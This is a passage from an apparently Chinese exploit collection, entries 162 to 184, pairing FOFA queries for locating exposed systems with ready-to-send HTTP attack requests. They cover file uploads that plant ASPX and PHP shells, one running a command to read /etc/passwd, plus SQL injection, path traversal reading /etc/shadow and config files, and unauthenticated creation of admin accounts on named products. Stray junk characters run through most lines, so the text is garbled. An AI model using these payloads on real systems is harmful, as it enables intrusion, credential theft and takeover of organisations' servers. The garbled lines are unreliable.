0 t2 y% |: p* @% e5 P0 w<soap:Body>6 i+ J8 w z' e! @7 C# e( M
<UploadResume xmlns="http://tempuri.org/">+ c1 b- [8 h) ]% X O
<ip>1</ip> Z( D2 b: t9 u4 Q& O, A- N R4 u. O5 ]
<fileName>../../../../dizxdell.aspx</fileName>! j' ^! `% o: Z- c/ t# M
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
& \4 | ?& _/ V8 [+ u5 B- h<tag>3</tag>: |8 k. H1 }- c
</UploadResume>3 i) [* e8 S2 c. `: E8 V
</soap:Body>
* Y% e+ z5 }0 W: ?2 Y; b</soap:Envelope>2 h" f5 i& G0 G: z& M" p
: o, | ^, o5 |; ~2 q o& o
2 s5 ~) C2 ~; d3 d d3 I6 K8 ghttp://x.x.x.x/dizxdell.aspx; l# l9 d0 n$ U4 d: X
2 o$ ^" a: I0 C) B162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传" [% [6 j$ {8 J, R. x* g: k+ Q
FOFA: app="和丰山海-数字标牌"
, B. E6 w% X5 r3 c1 fPOST /QH.aspx HTTP/1.1
X1 [( N6 l A6 MHost: x.x.x.x/ w7 A9 h- l; c) X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
! [ k1 A7 X+ W! X' d1 X" W# mConnection: close
2 x5 D" y& E( r) }. dContent-Length: 583
9 L$ T: r% s! B9 [1 {, qContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
' |: L* _( E2 U% g/ ]3 jAccept-Encoding: gzip
: E& ?6 e; m- _6 u/ }1 \
$ Y ^2 b I# x1 H7 Q------WebKitFormBoundaryeegvclmyurlotuey
$ K4 V. U6 @- F& _, ?& A8 D0 vContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
6 a) X9 K+ J1 z: i MContent-Type: application/octet-stream% t; Z7 a, ^: I
" w8 p- R5 `# E( r
<% response.write("ujidwqfuuqjalgkvrpqy") %>
! ]; ?6 j" J9 h0 W2 }: f------WebKitFormBoundaryeegvclmyurlotuey& N( L5 j2 p; w4 o, D/ i
Content-Disposition: form-data; name="action"$ C- I& a& ~6 s8 `
$ F0 S5 W6 n" O% }( o/ W% ?6 X3 Wupload5 f. p' O/ U" r
------WebKitFormBoundaryeegvclmyurlotuey& V. ]) e# ]1 \+ R
Content-Disposition: form-data; name="responderId"
} i, z; O& S# E. D
" o5 h6 J/ x7 f* TResourceNewResponder
( _/ I5 D- ^. J9 I* B& `------WebKitFormBoundaryeegvclmyurlotuey
1 ^9 M" s. T' {1 `, q/ AContent-Disposition: form-data; name="remotePath"& S* P7 c8 b& {0 @
% B$ M% n F7 H& R0 a* g, ^" f/opt/resources
6 C" |: P% X& k! S------WebKitFormBoundaryeegvclmyurlotuey--4 P/ {( N+ Q0 I& t% M% Z
; o% F6 m: T; d
5 J" _9 {+ m5 ?% z8 D& x phttp://x.x.x.x/opt/resources/kjuhitjgk.aspx
1 O9 d) g) t6 I" p$ F7 h* x* M! t: X. N% y9 @* h' D
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传, O; y( ~+ E- `7 t+ @% l( j. ~+ X
FOFA: icon_hash="-795291075"5 c" j9 ^! F: E* c
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
& q3 ~2 Q t, fHost: x.x.x.x
x& z& [' o; o, \! @" EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
6 k, g% C, K; y6 T' J& A" rConnection: close, C& p) Y* o6 c W5 P) ^' M
Content-Length: 2938 x- L3 d: M# r: {2 h5 a
Accept: */*
2 q/ D3 t. E/ mAccept-Encoding: gzip, deflate w5 H% x" B v* _5 z1 ? d
Accept-Language: zh-CN,zh;q=0.9
: K% L, G0 p2 p# `7 WContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
/ x5 H% @+ {9 x9 p1 ?6 J6 V4 d5 V' e9 D8 y1 m
------iiqvnofupvhdyrcoqyuujyetjvqgocod! h5 L) L" o! V4 ~) c7 l6 T
Content-Disposition: form-data; name="name"
- [5 F# S: ?+ e9 }, ?6 K* ~+ B, w$ ]/ X: K
1.php
) F+ l- }6 i% [- O) Q8 a------iiqvnofupvhdyrcoqyuujyetjvqgocod
3 M; z; t; U( O% L: e& RContent-Disposition: form-data; name="upfile"; filename="1.php"/ J/ _7 D$ N0 L' g
Content-Type: image/jpeg, A. [; R0 c Z; T# O3 T5 E- h+ L# y
) { \( ]$ o9 trvjhvbhwwuooyiioxega( v$ B" h2 E6 e8 \2 `$ U* ]6 o' ~
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
4 t1 O' e6 N7 z/ _0 B& W b1 m+ g4 s8 ]. @1 Z
* Z0 V# z5 D" X$ j' P% u164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
* R- U o, J7 T u8 o, W! o9 qFOFA: title="智慧综合管理平台登入"
- Q+ O, c/ [, m4 K" MPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.16 J h6 N6 I7 d2 N1 l
Host: x.x.x.x* X- B; N; e- d, Y, p& @) B! I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.02 N4 g/ P3 P* |! w" }) t; I4 j
Content-Length: 288+ r. X6 F. O' ~5 a( F
Accept: application/json, text/javascript, */*; q=0.01
" V' F4 ]- L0 h0 jAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
' N- ]& w# A& E+ Y3 {# HConnection: close
3 o1 a0 G' H+ {% @: lContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
. k: d( X. x# Q' k8 NX-Requested-With: XMLHttpRequest, `+ J7 g& w) g
Accept-Encoding: gzip6 t' w- J; w) P" F% e
& u! F. R( x4 q1 c! ^------dqdaieopnozbkapjacdbdthlvtlyl+ P9 s% T* x7 W" O0 `7 f' U
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
7 m9 I4 R1 G; e& u8 ~Content-Type: image/jpeg4 F0 q" P6 z$ k9 y4 h
$ z# X0 k7 a! w$ x( ?
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>9 m+ d' e0 S* k, m+ J9 ~. I; N" q
------dqdaieopnozbkapjacdbdthlvtlyl--$ a, o' |/ s1 d% R a
1 w- }% ^ ]+ j( n+ d0 |
3 k% u" v5 T' D) F o
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx' T" f j7 {- R2 ?: @
& l# d3 n6 u" t7 n2 J1 b165. OrangeHRM 3.3.3 SQL 注入
# R8 o; p# @& a9 QCVE-2024-36428
3 G7 K0 E" W( @FOFA: app="OrangeHRM-产品"
7 I8 i4 R9 E: m$ b7 j; hURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
9 b" |# x$ E4 } ~8 O' X6 t1 o- j+ x! a/ y" [
* D: X* ^, \) _
166. 中成科信票务管理平台SeatMapHandler SQL注入3 @3 n5 r5 ^+ }, M2 K
FOFA:body="技术支持:北京中成科信科技发展有限公司"
) w: { P0 ~8 d- i5 K! A/ j! ~POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
8 e- u4 x$ O# }; |) J- E) {& v% UHost:, O# p3 _, d$ F4 T( ?% W
Pragma: no-cache
5 o( n# @6 R) z4 V. g1 u0 L0 c. {Cache-Control: no-cache
5 M/ d! e+ A) e- x+ t* n! C4 GUpgrade-Insecure-Requests: 1
' G$ t" ^! N4 C* YUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36% F: a ~4 v# I) Y2 }- c3 S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' o# U3 @" i6 X" L, EAccept-Encoding: gzip, deflate
5 D2 C; m' |8 K5 [' J' N/ A4 GAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
3 n1 Y. L' d9 _$ F3 QCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE9 n3 b$ l/ K% j+ h2 ]- X* ]) W
Connection: close' S' C' H( ]8 I( C2 C
Content-Type: application/x-www-form-urlencoded
! O. p( n; o' R" E/ NContent-Length: 89
0 Z! b0 r6 X1 F) q& h% f5 B0 x* S- P+ m7 S' u z3 M q. C& m
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
" N# f- y& E, f* _' Y5 L+ w4 L* j3 N* S9 B0 w0 I, R4 e
% T k# n- f4 k4 ` Z
167. 精益价值管理系统 DownLoad.aspx任意文件读取9 j- t8 R/ P, ~: q; T0 Q& f2 L: t
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"9 X4 q+ Y$ |! s2 b5 _* {
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.18 z1 R" ]# Y2 s8 \9 o+ O
Host:
4 b& p' b( @- ]6 OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
& q% h: D$ ?% h& {Content-Type: application/x-www-form-urlencoded2 r% h2 h$ S @$ Y
Accept-Encoding: gzip, deflate3 [& E& k1 l( _9 J$ |% M
Accept: */*2 K$ d: X! h) l5 w
Connection: keep-alive
- f# }; ?3 a! \) f
) f7 ^/ r8 B( }
4 v' v- `( c' H; z$ p! F168. 宏景EHR OutputCode 任意文件读取
* N! L( b$ ]3 H2 d2 @FOFA:app="HJSOFT-HCM"
3 _. h$ L; l% I( LGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
$ j4 u% P. n$ P0 g6 |Host: your-ip5 ?2 M$ ~: Y, U% p& _: ?- o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.367 M( z8 m5 d9 `. Z7 e, f# \
Content-Type: application/x-www-form-urlencoded
& p8 N, B1 b) ~: X; }Connection: close
; L! L: u" x& f# h
8 o. A2 s; O4 c! J8 o& G
! {* m% G, f4 W& N7 F; l2 ?! R: n
+ R* ]* `# D) B3 S6 A169. 宏景EHR downlawbase SQL注入/ e* w' h5 T/ h- @, `
FOFA:app="HJSOFT-HCM"6 i* V/ p5 J( n# C" o7 ~
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1) Y! K; h" e- {! x
Host: your-ip
7 b1 w7 ]+ @, R1 ^! p" z) |1 GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
0 N+ i* i3 [; S6 z. ?8 z PAccept: */*1 j' W9 ]+ d7 b5 J# h
Accept-Encoding: gzip, deflate+ A$ B/ `7 ?' s3 I
Connection: close, f$ |$ N; D' c& R! U
9 l- }+ X! l4 i
( N, G1 \$ a5 _
! l& g! J2 T2 c; Q: k0 U
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
. s2 K$ [0 D+ Q& U1 { WFOFA:body="/general/sys/hjaxmanage.js"
/ q: f# p+ u# u" B/ Y6 o9 _9 @1 NPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1# I8 ]/ k g8 K+ l3 Z6 d) Z" i
Host: balalanengliang
$ y1 C- \. x8 S! q" s# Q, t: VUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
( _) A. L4 _) ], H7 y4 DContent-Type: application/x-www-form-urlencoded
1 T, Z: z9 B, V, [) n$ d6 P0 K( Q% E u! R- E5 U- f
filename=../webapps/ROOT/WEB-INF/web.xml
6 U$ G4 b7 p6 p. Q2 m9 b" @
' ?+ a3 }. K# ~3 O
" M( U9 v; p# `1 d" p171. 通天星CMSV6车载定位监控平台 SQL注入
5 ^) U2 c9 Q6 [* Q' mFOFA:body="/808gps/"" `, X) o- X9 E+ @ R5 @7 O2 n
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1 e* f; v+ f5 u% ~
Host: your-ip
" \6 ?) B7 K# Q- _User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
5 |) A9 I7 e/ i$ D8 E) N; e. c3 VAccept: */*- b# x: H" x* \! n1 T
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ u* u. Z5 y' I- p6 u+ t
Accept-Encoding: gzip, deflate1 a: z" o& \4 q. h" ~+ u7 y# h+ y) n
Connection: close
: x4 C% Q* K+ [' E" }! H6 p; o% F% }8 F3 _# h9 ?1 A; S
5 M, S1 z" b* w2 ?' o9 a. @* M9 ? L3 M
172. DT-高清车牌识别摄像机任意文件读取
& w+ L0 V& P6 ^* c, ZFOFA:app="DT-高清车牌识别摄像机"
% R! l& ]' l3 aGET /../../../../etc/passwd HTTP/1.15 f# S8 G5 }& G, l+ j0 n/ `
Host: your-ip2 n* K! m% G) d) k# E& M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.363 |. U, r" |1 i. N* s
Accept-Encoding: gzip, deflate
8 ?$ c" b }$ u U BAccept: */*! G4 a' o% a% p/ Z
Connection: keep-alive
8 Q% p5 d2 z2 X7 c6 |4 _4 k9 O: |5 `' w4 G; g" m
" F5 Y; Y) q8 L; U0 p
Z) h, K3 x: T6 V173. Check Point 安全网关任意文件读取8 L: u J5 \- A$ Q1 @! S: x
CVE-2024-24919
( `7 F; M- z7 |" }FOFA:app="Check_Point-SSL-Network-Extender"
% r, _1 h- s% i' l P4 XPOST /clients/MyCRL HTTP/1.1
$ t \; S; [ q5 s IHost: your-ip
$ Z& C6 W) R7 G! ?6 s( I9 D* DContent-Type: application/x-www-form-urlencoded
: T: ]5 ]$ e) _6 q$ I4 N3 Q: s6 W/ H# _1 I! Y
aCSHELL/../../../../../../../etc/shadow: p' I2 J3 e- D; t
% X$ Z* F' R& x9 ]# j
) L* M/ t3 X; H3 {
! i7 E9 J! Z( y) _6 M! _, S
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
- ]2 e" v3 n a, x }5 p, kFOFA:app="金和网络-金和OA"' h/ B" A G' E
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
6 L( D; c9 N& h* [. U SHost: your-ip
4 ]- y: h# D* Y8 S6 \3 _& gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
/ z# H$ f6 w9 A( sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) Z# i8 ?- L, g/ i% g3 `3 TAccept-Encoding: gzip, deflate, br
5 Z3 g3 \/ w" \" FAccept-Language: zh-CN,zh;q=0.9
3 u: s" V+ F0 BConnection: close
! Q' H7 B4 b# w }& ~. I$ R2 b }/ \; j+ R) H) n8 N7 w+ P; n2 l
+ S( d; {8 f% D. g/ W& L, e
! {, Z$ Y) w( I+ g+ N+ l$ v' G0 Y175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入! h: f' e% S l' }. h
FOFA:app="金和网络-金和OA"
. s( q) x- W$ w. uGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1( v! w+ R4 l9 K! ]2 P
Host:
0 F2 M) Q; q* O& q3 x: M& hUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
( L+ i2 }, O+ U8 v g9 yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 e7 T- _6 X6 x: I' ~# _
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 ]5 k5 Y0 f8 v, H9 I2 {+ n1 i
Accept-Encoding: gzip, deflate. U9 j& ^! _9 t0 e6 @
Connection: close9 u9 `' ]$ n4 e: A, F0 D* r& r
Upgrade-Insecure-Requests: 1
; [) ^9 C5 ~: e+ K# c" k* I
% S6 d2 T L# y
9 @' ?+ [# N4 S8 v! W/ N x176. 电信网关配置管理系统 rewrite.php 文件上传
) E1 h1 f4 ]( l, xFOFA:body="img/login_bg3.png" && body="系统登录"" u/ @9 D2 v. s9 Y: ^' _1 m4 M% D% v
POST /manager/teletext/material/rewrite.php HTTP/1.1$ q: }1 n8 N. V/ Y6 b' O8 w
Host: your-ip) a0 l2 R; v2 B5 Q3 l3 @3 P" A5 M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
( j A& g0 H9 w2 UContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT" ?. e% n5 `) w
Connection: close7 e8 }% b. s4 s4 Q5 E& b" H
$ o; v$ o: d0 Q7 ^/ f------WebKitFormBoundaryOKldnDPT2 J; U8 ~* T0 ~! B
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
9 a1 d7 S- W% V( @/ K ?1 R& uContent-Type: image/png* j$ R3 I/ H' J K
3 ?; e0 U _9 i$ Q6 Y' F<?php system("cat /etc/passwd");unlink(__FILE__);?>
6 x4 `. r0 f% @# F+ s------WebKitFormBoundaryOKldnDPT
) ^" O( p7 A7 \7 b v: u% {Content-Disposition: form-data; name="uploadtime"/ z4 k/ S8 U" \& O5 n: Q) \, Q: i$ T
/ i# ? f3 u4 F
% z% \+ i9 A/ l' S! h5 |------WebKitFormBoundaryOKldnDPT--
9 k/ o. Q: |& U O: \& [! x* r" n, B: ~; x7 X I* d( g
3 v! ^- h G) Q& m9 G A
: E I/ |: ^, R% A: w# r7 D
177. H3C路由器敏感信息泄露
0 B8 J0 u% d. l" ]1 W/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg# ?6 S, _3 H4 }4 Q' r
/userLogin.asp/../actionpolicy_status/../M60.cfg
" Q' N2 t8 |1 [; K/userLogin.asp/../actionpolicy_status/../GR8300.cfg
; o: B0 E7 u7 H+ R( C$ K0 w/userLogin.asp/../actionpolicy_status/../GR5200.cfg* p5 \, J9 R4 F$ l. r9 y7 p: v5 R
/userLogin.asp/../actionpolicy_status/../GR3200.cfg2 T8 w2 h1 T6 j4 U2 O) @4 Y
/userLogin.asp/../actionpolicy_status/../GR2200.cfg; I1 B$ T* f' y% {5 A4 B8 P3 j; d
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg: M" c* m9 Q7 C# Y9 u, q7 J
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg2 e% T( Y4 t% `" ]2 [5 P4 x6 s/ g: o
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
: K% {3 A* L& z/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
% L' w4 k4 o4 V8 W1 W- p0 g/userLogin.asp/../actionpolicy_status/../ER5200.cfg2 `- b' a6 S" F: Q9 K$ G+ \# ^
/userLogin.asp/../actionpolicy_status/../ER5100.cfg/ u# T% y3 |& H: x" L# o4 O" I
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg; p# P1 r) @* m
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
8 Y+ F7 \9 o8 K Y! R1 f9 W/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
' p. H% a: Z& ~) ?8 ]# |- R/userLogin.asp/../actionpolicy_status/../ER3200.cfg
1 t, W8 D- [0 ^3 ~/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg* f) ?0 m# F. P) ~! N2 T& h' V* E
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
' b5 n1 I5 U3 ^6 |3 [- [4 C/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg, ?4 d0 F% i! s5 i1 @
/userLogin.asp/../actionpolicy_status/../ER3100.cfg' S: L4 ~: Y. V# I+ n) f0 T
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
; D* F) }# F9 G4 W2 ^5 o
8 }6 L' c2 G6 T! c% ?8 _! v& _: \+ r8 \& v4 @/ H; C
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
, D: c0 ?2 F" a) YFOFA:header="/selfservice"% s- T: G! Z/ c. P8 x
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1* @, u3 z2 |4 d* L, c$ ]7 W
Host:3 Q g- `$ ^8 M& X! h8 ~9 w2 W( U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36( `; z4 ?( v7 w
Content-Length: 252
/ \5 t: y; Z0 u) B( E( AAccept-Encoding: gzip, deflate% m0 i$ ]9 Y7 E3 D! x, H4 u& b( m6 ]
Connection: close
6 s8 m! Z- i2 _3 |' d1 s3 ZContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
" A1 X8 u3 U$ P- g3 e3 a-----------------aqutkea7vvanpqy3rh2l
& c- ?) d% Z* tContent-Disposition: form-data; name="12234.txt"; filename="12234"
% O2 s$ s8 R$ m8 b3 q3 rContent-Type: application/octet-stream
( m8 c+ f5 O, X, s$ [' LContent-Length: 255
9 `5 z8 l. [/ r( b$ |' M/ I3 [! ?' w1 {( p! N$ C- P
12234
1 r4 c* w* L( ] X9 G-----------------aqutkea7vvanpqy3rh2l--5 V) Y2 V$ X) X4 @8 v7 U1 `4 X
1 Y% E8 F1 k/ T r/ L1 i* M5 Q W# x+ s. ]8 }. T( Q9 c1 i
GET /imc/primepush/%2e%2e/flex/12234.txt
7 L, y) R' s5 r+ q" v0 O0 D& _) C: m( V, F1 y/ m% Q
3 }+ R/ f2 @7 [3 a+ g+ E$ y
179. 建文工程管理系统存在任意文件读取$ C: L8 X! \) n: H
POST /Common/DownLoad2.aspx HTTP/1.1
, F, m6 A \ L( P# ?$ JHost: {{Hostname}}
0 g2 Q# k& F( _6 i w8 {' vContent-Type: application/x-www-form-urlencoded% R8 K0 Z6 V4 [; ?/ D' k8 V
User-Agent: Mozilla/5.0: X" F, }6 b7 b, g1 \' b
& W+ A( d. H3 @: Ppath=../log4net.config&Name=
2 S8 M6 F5 Q3 d( g q" ` z6 v1 e7 w8 J1 J& V" t4 u* w
; @8 j2 H4 B5 N6 V& r180. 帮管客 CRM jiliyu SQL注入
0 j4 v0 {/ \) H& q' }& B, TFOFA:app="帮管客-CRM") E, }. }" c& ^& [% W
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
' E" {' B3 L8 [! G9 \Host: your-ip
- S) e7 f3 A$ J$ Z3 mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36* T5 J' K" v3 i( j7 _8 O/ q) r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# {5 s. q3 i4 @8 {' f
Accept-Encoding: gzip, deflate( B1 `3 a1 ?- V+ A
Accept-Language: zh-CN,zh;q=0.9
# r2 X4 h/ O5 b6 n& ~3 IConnection: close! u* m. d- D2 M2 D
- w( x k, T t c3 q
5 v/ N0 X- o R7 W6 m& w! P8 ]181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入5 F0 r8 E% E* G4 v
FOFA:"PDCA/js/_publicCom.js"
% {* g8 H; G* P- s3 Z% G! b9 v" lPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
. M9 a7 ?* k) I& \( qHost: your-ip! Y: a. x1 M1 D5 w0 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36, G8 n/ P5 }+ {4 w* h1 V0 K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; G5 ~: N R, O: b7 q! _
Accept-Encoding: gzip, deflate, br! O2 P1 Z( V( f, c4 x4 h! P- C
Accept-Language: zh-CN,zh;q=0.9) R( G' r- _! E5 I
Connection: close& S" s: }4 p6 a5 S4 W3 x1 y8 \
Content-Type: application/x-www-form-urlencoded' E, J0 T; a' u7 }: S. n
$ D. i0 e0 N" L- V% K) s1 n @' Q% K
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=200 e' {, X# z+ i; @- y6 C
L- N5 V% j' O: f7 t' z$ u
5 T K) A/ C- m" ^
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
/ `# ^. c$ l, ^$ ~: y; Y' xFOFA:"PDCA/js/_publicCom.js"
X8 V" f; m6 n+ `7 nPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.18 {& @/ j$ g; w" j" f- I! |! W
Host: your-ip# I7 v6 H1 m- i3 | g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
# N$ q' H& \. [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 g4 l) u" |* o" S0 x; N
Accept-Encoding: gzip, deflate, br H) N. J" d& F, y7 |
Accept-Language: zh-CN,zh;q=0.9" X8 p9 l7 c5 z
Connection: close/ S' E) T' |5 E: M1 \
Content-Type: application/x-www-form-urlencoded1 [! h* D/ [7 m% O
# ^0 }( D2 v$ G! f# V4 H& \ W0 d* ]7 H" t- L. f4 G" g6 T% p
username=test1234&pwd=test1234&savedays=1& |8 x5 Y0 K3 A6 L. R+ _% \ K# z
2 m/ J) p9 h6 K/ P' t
# {3 S1 \* G; h" \- A: ^) H1 h/ u
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入! }* F' }$ ~, o3 _9 E) O4 M' K
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"* ^& f$ |* U. @0 L' s4 N9 T
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1* g/ N. {* Q c. i$ [, q+ A3 u- e
Host: your-ip) P- |* [- y" e% @& H0 q/ y+ u) c
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36; R/ m$ o& i e" Q+ {
Accept-Charset: utf-8
) S7 {$ U, a Y0 B; m9 EAccept-Encoding: gzip, deflate
+ i2 S7 h% U7 B- | V1 S) w0 O" b iConnection: close
8 {0 O# z% I# s; E5 d# g; `3 G; b3 f$ |8 M7 p
0 h0 G( n/ `8 ]% j" c184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
' \+ M3 p- p2 pFOFA:server="SunFull-Webs"
* Y3 o* `# _% A& |' ^7 L; CPOST /soap/AddUser HTTP/1.15 e3 g! M6 E8 _( \% t9 l
Host: your-ip) I& L# q k' H+ v! D) a* S2 E; ^# e
Accept-Encoding: gzip, deflate
" t7 I# P/ {9 X1 B8 m! \+ c1 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0/ I2 t* J P4 s, J. I
Accept: application/xml, text/xml, */*; q=0.01+ l8 T$ j& e3 k5 X0 t( A
Content-Type: text/xml; charset=utf-8! P+ ]0 Z& L4 K& J9 t; U0 y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 K* k( A: k% l+ t3 X5 u
X-Requested-With: XMLHttpRequest8 x" D b$ |# ?; V( N( c
. Z4 g5 t n0 n& w: P1 k
4 x8 i& }1 ?, D( N. C/ J& |4 _2 ?3 [insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56'): y- O; |/ W9 Y3 C! B
8 S' S, [! v t8 h- g
